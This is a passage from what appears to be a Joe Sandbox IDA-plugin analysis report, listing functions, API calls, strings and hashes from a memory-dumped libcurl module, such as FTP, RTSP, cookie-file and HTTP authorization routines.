                                                                                                                                  • Instruction Fuzzy Hash: A091E475E043149FEB118F64DC4179677ACAF013AAF0449B9EC089B241E73DA896CBF1
                                                                                                                                  Function 6B8FFD60 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 162COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(CSeq:,6B8EC3E5,00000005,?,?,?,?,?,6B8EC3E5), ref: 6B8FFD7E
                                                                                                                                  • curl_strnequal.LIBCURL(Session:,6B8EC3E5,00000008,6B8EC3E5), ref: 6B8FFDE8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: : %ld$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Unable to read the CSeq header: [%s]
                                                                                                                                  • API String ID: 482932555-1168109407
                                                                                                                                  • Opcode ID: 594da866a162260a1662e35a2f0509457b9f4d065b5d6777da247f559d950d9e
                                                                                                                                  • Instruction ID: 5c5f09f6d0ed8b6947d1a6d57e7a9a35574bbd8ac72b6f98934fea844314605e
                                                                                                                                  • Opcode Fuzzy Hash: 594da866a162260a1662e35a2f0509457b9f4d065b5d6777da247f559d950d9e
                                                                                                                                  • Instruction Fuzzy Hash: AF412976A0510426DB108E7DBC41BE73B9DDF962A9F0444B6EC4CCF203EA2AD516C6F1
                                                                                                                                  Function 6B90A0E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                  • _strncpy.LIBCMT ref: 6B90A12D
                                                                                                                                  • _strrchr.LIBCMT ref: 6B90A16D
                                                                                                                                  • _strrchr.LIBCMT ref: 6B90A188
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B90A1B3
                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B90A1C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                                  • String ID: Unknown error %d (%#x)
                                                                                                                                  • API String ID: 1320708361-2414550090
                                                                                                                                  • Opcode ID: 502d45afbf67a73fbfaa0632ff6bbcf3f186894b81836e6e4dbd3c274c368940
                                                                                                                                  • Instruction ID: 67138b6325244a38c983fb58171b43ff430df59fce84d0afd51eb0aa8d926853
                                                                                                                                  • Opcode Fuzzy Hash: 502d45afbf67a73fbfaa0632ff6bbcf3f186894b81836e6e4dbd3c274c368940
                                                                                                                                  • Instruction Fuzzy Hash: C421D175E042186BDB116E75AC81B6F7BADEFA625DF1080ADEC0497241EF39D90182F2
                                                                                                                                  Function 6B8DD3D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 250COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Uploading to a URL without a file name!, xrefs: 6B8DD5EB
                                                                                                                                  • Request has same path as previous transfer, xrefs: 6B8DD68E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                                  • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                                  • API String ID: 2378022753-131330169
                                                                                                                                  • Opcode ID: 76aefeeac5f20647ff5e6d0697878f0b1dfcdd474aed08b14d6330c4919ad9b1
                                                                                                                                  • Instruction ID: d07ab59b8ead30b5f64f17a0d188dd8ee90065a223fbd86b1a8ac58dce77f40d
                                                                                                                                  • Opcode Fuzzy Hash: 76aefeeac5f20647ff5e6d0697878f0b1dfcdd474aed08b14d6330c4919ad9b1
                                                                                                                                  • Instruction Fuzzy Hash: 8791F971A88216ABDB148F34D845B9A7BB5EF0234CF0045BAEC0D9B241EB3AE555CFD0
                                                                                                                                  Function 6B8D6600 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 223COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B8D679A
                                                                                                                                  Strings
                                                                                                                                  • %s.%s.tmp, xrefs: 6B8D66C1
                                                                                                                                  • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B8D6707
                                                                                                                                  • ## Fatal libcurl error, xrefs: 6B8D67F5
                                                                                                                                  • %s, xrefs: 6B8D6792
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mfprintf
                                                                                                                                  • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                                  • API String ID: 8901498-4087121635
                                                                                                                                  • Opcode ID: 48d88b35c28a51f3a46adcef805b1ac5eeea91dabca669a6d1f7ee4a6811baf7
                                                                                                                                  • Instruction ID: 2ce6d452fa3a9b8fbb1daae634591d0d129f53add980bee1443a2b5c1c3e457c
                                                                                                                                  • Opcode Fuzzy Hash: 48d88b35c28a51f3a46adcef805b1ac5eeea91dabca669a6d1f7ee4a6811baf7
                                                                                                                                  • Instruction Fuzzy Hash: 4461C6B5E4425D9BDF008FB89C927BF7BB49F46218F0408BADD05A7202DB3DD91587A1
                                                                                                                                  Function 6B8DD8E0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strstr
                                                                                                                                  • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                                                                                                                  • API String ID: 2882301372-2096918210
                                                                                                                                  • Opcode ID: 645043b5d9296f51a4ee9539608bb8f95cfd443e4ff50b6db515e8fab0ec83ce
                                                                                                                                  • Instruction ID: b7a4a30d037e951a5a26b7aca2c6d73ff612e7e4a05b8778671d001465196a5a
                                                                                                                                  • Opcode Fuzzy Hash: 645043b5d9296f51a4ee9539608bb8f95cfd443e4ff50b6db515e8fab0ec83ce
                                                                                                                                  • Instruction Fuzzy Hash: 6351F476D48244ABDB10CF68D840B9E77B5AB44324F008AEBEC2C9B291D7399544CF91
                                                                                                                                  Function 6B8E7930 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E7987
                                                                                                                                  • inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E79C4
                                                                                                                                  • inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E79D5
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E79E2
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E79FA
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E7A2A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr$inet_pton
                                                                                                                                  • String ID: xn--
                                                                                                                                  • API String ID: 1785450883-2826155999
                                                                                                                                  • Opcode ID: 52626953298564ac974ee68f6d137e342f1bedf0798371d12087c309adaa4a3a
                                                                                                                                  • Instruction ID: 4d1e42ff086cc90a58a8fd85455392836f6058a00e8d94cd6f1dfab88a00d9f1
                                                                                                                                  • Opcode Fuzzy Hash: 52626953298564ac974ee68f6d137e342f1bedf0798371d12087c309adaa4a3a
                                                                                                                                  • Instruction Fuzzy Hash: C641EA79A4420E5BEF10CE78AD41BBD77ACDF5665CF0401ADDC09DB242EB29CA06D2B0
                                                                                                                                  Function 6B8DEA30 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                                  • API String ID: 3418963191-1262176364
                                                                                                                                  • Opcode ID: 20717b79f36620f974b38c2ecea1e7ca83ceb32a2bff85e4b647e03505679785
                                                                                                                                  • Instruction ID: 15230230bec12f3c81ff533df7d4a548972d7734a770ab33770cdd007f2c28c1
                                                                                                                                  • Opcode Fuzzy Hash: 20717b79f36620f974b38c2ecea1e7ca83ceb32a2bff85e4b647e03505679785
                                                                                                                                  • Instruction Fuzzy Hash: 3B413076B102346BDF104A68EC85F6AB7A9DB8576AF004977FD0DE7201D729DC4483E0
                                                                                                                                  Function 6B8ED930 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8ED9E9
                                                                                                                                  • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B8ED9FE
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B8EDA61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
                                                                                                                                  • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                                                                                                                  • API String ID: 2694567262-3976116069
                                                                                                                                  • Opcode ID: e0a10287625a5bd63ee05ea27d46dac28d2096f32a0979cbd733ca0a6ed5a9ed
                                                                                                                                  • Instruction ID: b4270ebfb27f7a8f292f7d60cf764c0675b934f4c8287c3341346b8a7bb43c1f
                                                                                                                                  • Opcode Fuzzy Hash: e0a10287625a5bd63ee05ea27d46dac28d2096f32a0979cbd733ca0a6ed5a9ed
                                                                                                                                  • Instruction Fuzzy Hash: C7418275B04218AFDF00CFA8D881BAD7BF8EF46344F4484B9E808DB251E735DA558BA1
                                                                                                                                  Function 6B8F28F0 Relevance: 12.2, APIs: 8, Instructions: 199COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_mime_data.LIBCURL(?,?,?), ref: 6B8F2917
                                                                                                                                  • curl_mime_filedata.LIBCURL(?,?), ref: 6B8F292A
                                                                                                                                  • curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B8F2955
                                                                                                                                  • curl_mime_init.LIBCURL ref: 6B8F2963
                                                                                                                                  • curl_mime_subparts.LIBCURL(?,00000000), ref: 6B8F2976
                                                                                                                                  • curl_mime_addpart.LIBCURL(00000000), ref: 6B8F299D
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?), ref: 6B8F2A1B
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?), ref: 6B8F2A44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177825088-0
                                                                                                                                  • Opcode ID: 870f7e50911d0b6e857151ca31a0bf9c48e2b0d095dbab0debe01f03aebc4c72
                                                                                                                                  • Instruction ID: c22c6f4d22d9b488bf99597b6ef29eecdc46d9152cf043875bcb80d550872748
                                                                                                                                  • Opcode Fuzzy Hash: 870f7e50911d0b6e857151ca31a0bf9c48e2b0d095dbab0debe01f03aebc4c72
                                                                                                                                  • Instruction Fuzzy Hash: 0B51F876A00565ABDF108F28E88195A7768FF05394B0405B8FD099B701E73EED32DBD2
                                                                                                                                  Function 6B8E0900 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 318COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strrchrcurl_maprintf
                                                                                                                                  • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - Parsing started$Wildcard - START of "%s"
                                                                                                                                  • API String ID: 1669751406-1301414817
                                                                                                                                  • Opcode ID: 68dcda977bea72720c9013a552802f19c985d1daa28c10582787cab980375dc8
                                                                                                                                  • Instruction ID: fd93a2d1bf4b1df6e060e4bba5702887247a3c8d118028aa43f85b566c46057c
                                                                                                                                  • Opcode Fuzzy Hash: 68dcda977bea72720c9013a552802f19c985d1daa28c10582787cab980375dc8
                                                                                                                                  • Instruction Fuzzy Hash: 41C1B275A006049FDB10CF68D882BC6BBE1FF46315F1448BAE95DCB210EB79E586CB61
                                                                                                                                  Function 6B8EFDE0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 256COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_url_get.LIBCURL(?,00000008,?,00000040), ref: 6B8F005B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_get
                                                                                                                                  • String ID: MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                                                                                                                  • API String ID: 1525506501-2060961330
                                                                                                                                  • Opcode ID: dc6d1dc3e6bb91c30610e095a09d82029b58d3391e3d0ac100a290eca3f7502f
                                                                                                                                  • Instruction ID: eaaaaebb0700b67b2d7443479d69b32c36fd03a79f8d04384f8ac7cd01505d45
                                                                                                                                  • Opcode Fuzzy Hash: dc6d1dc3e6bb91c30610e095a09d82029b58d3391e3d0ac100a290eca3f7502f
                                                                                                                                  • Instruction Fuzzy Hash: 13911974E04245AFFB10CE24E851B697BB8AF52349F0048EDEC588B642DB3ADA55C7F1
                                                                                                                                  Function 6B8EDC80 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 249COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B8EDF14
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
                                                                                                                                  • API String ID: 3307269620-819322280
                                                                                                                                  • Opcode ID: a6d97043fa1493b628b9f33369ec7383e8265c1613ab3c0b3ae170f567fd6433
                                                                                                                                  • Instruction ID: f55cba6aa0bc07a7d3bca0f2606291db5f9b8ad0c22e304d38b9764f88ee515c
                                                                                                                                  • Opcode Fuzzy Hash: a6d97043fa1493b628b9f33369ec7383e8265c1613ab3c0b3ae170f567fd6433
                                                                                                                                  • Instruction Fuzzy Hash: 3391F875A042199FDB11CF68C880BDABBF5EF86318F0444A9D848D7200D77AE959CBA1
                                                                                                                                  Function 6B8DD6C0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 188networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B8DD874
                                                                                                                                  Strings
                                                                                                                                  • *, xrefs: 6B8DD849
                                                                                                                                  • FTP response aborted due to select/poll error: %d, xrefs: 6B8DD87B
                                                                                                                                  • We got a 421 - timeout!, xrefs: 6B8DD81E
                                                                                                                                  • FTP response timeout, xrefs: 6B8DD8BA
                                                                                                                                  • QUOT string not accepted: %s, xrefs: 6B8DD89F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
                                                                                                                                  • API String ID: 1452528299-2335292235
                                                                                                                                  • Opcode ID: 02cf3b28e0e3292d7784a0c97c824cd95dfcebfb6251aa5a87defcf42219c11e
                                                                                                                                  • Instruction ID: 6be69996089d7e9c2e2724bedf1b015ef577ce1af1f302ff4fde97729b47e1f9
                                                                                                                                  • Opcode Fuzzy Hash: 02cf3b28e0e3292d7784a0c97c824cd95dfcebfb6251aa5a87defcf42219c11e
                                                                                                                                  • Instruction Fuzzy Hash: 48510436F44208AFEF018E6CDC41BAE7BB5EB45319F0049BAED18D7291EB3995418B91
                                                                                                                                  Function 6B8D1A20 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 166COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B8D1B38
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B8D1B5D
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B8D1B79
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %c%c%c%c$%c%c%c=$%c%c==
                                                                                                                                  • API String ID: 1809024409-3943651191
                                                                                                                                  • Opcode ID: b7315270e009c58a3ea1e8fb7d20fe42c3308f0b6faf5c5a86a4b33f57ac2916
                                                                                                                                  • Instruction ID: 44c8275215779661be0c97ba8023335651a0e3793c61205ff4c7e912de629461
                                                                                                                                  • Opcode Fuzzy Hash: b7315270e009c58a3ea1e8fb7d20fe42c3308f0b6faf5c5a86a4b33f57ac2916
                                                                                                                                  • Instruction Fuzzy Hash: 4751F4719081A55FDB01DF688891BFE7FF89F46305F0545E6ECA4DB252E638CA12CBA0
                                                                                                                                  Function 6B8EADB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 111COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
